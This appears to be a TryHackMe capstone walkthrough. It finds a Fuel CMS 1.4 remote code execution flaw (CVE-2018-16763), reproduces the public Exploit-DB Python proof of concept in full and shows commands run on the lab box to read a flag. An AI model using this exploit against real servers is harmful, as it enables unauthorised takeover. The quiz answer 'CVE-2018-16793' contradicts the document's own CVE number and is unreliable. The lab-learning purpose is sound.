Vulnerability Capstone [TryHackMe]

Here we are going to leverage the skills which you might have learned within the Vulnerability Research module.

Task:

“Ackme Support Incorporated has recently set up a new blog. Their developer team have asked for a security audit to be performed before they create and publish articles to the public. It is your task to perform a security audit on the blog; looking for and abusing any vulnerabilities that you find.”

Let’s Do It!

My target box was @ 10.10.179.174.

Navigating to the page we can see the default page for the application and we are greeted with a “Welcome to Fuel CMS Version 1.4”

Let’s answer some questions:
What is the name of the application running on the vulnerable machine?
Fuel CMS
What is the version number of this application?
1.4

Alright so far so good… with the disclosure of the app and version we can go do some digging to see if we can find any existing vulnerabilities for this application…Bingo:
Google Search:

fuel CMS 1.4.1 - Remote Code Execution (1) - Exploit Databasehttps://www.exploit-db.com › exploits
Jul 19, 2019 — fuel CMS 1.4.1 - Remote Code Execution (1). CVE-2018-16763 . webapps exploit for Linux platform.

    Fuel CMS 1.4.1 - Remote Code Execution (2) - Exploit Databasehttps://www.exploit-db.com › exploits
    Jan 28, 2021 — Fuel CMS 1.4.1 - Remote Code Execution (2). CVE-2018-16763 . webapps exploit for PHP platform.

We can answer another question:
What is the number of the CVE that allows an attacker to remotely execute code on this application?
CVE-2018-16793

I decided to go with the following PoC code at https://www.exploit-db.com/exploits/47138. Here is the code:

# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
	xxxx = raw_input('cmd:')
	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
	proxy = {"http":"http://127.0.0.1:8080"}
	r = requests.get(burp0_url, proxies=proxy)

	html = "<!DOCTYPE html>"
	htmlcharset = r.text.find(html)

	begin = r.text[0:20]
	dup = find_nth_overlapping(r.text,begin,2)

	print r.text[0:dup]

This code does require some adjustments for it to work for us. I went ahead and made the adjustments, you can snag the code from my GitHub: https://github.com/ManuelBerrueta/SecLabs/blob/master/TryHackMe/Jr_Pentester_Path/Vulnerability_Capstone/CVE-2018-16763.py

To run it just run python CVE-2018-16763.py --url http://[Target_IP]/.

Once we are within the cmd> loop we can run commands and search through the request response for the output. I found the output to be after the first </div> tag:

cmd>ls
----snipped for space saving----
</div>README.md
assets
composer.json
contributing.md
fuel
index.php
robots.txt
----snipped for space saving----

After some looking around, I found a flag.txt file in /home/ubuntu/:

cmd>cat /home/ubuntu/flag.txt
----snipped for space saving----
<\div>THM{A****_****_*****D}
----snipped for space saving----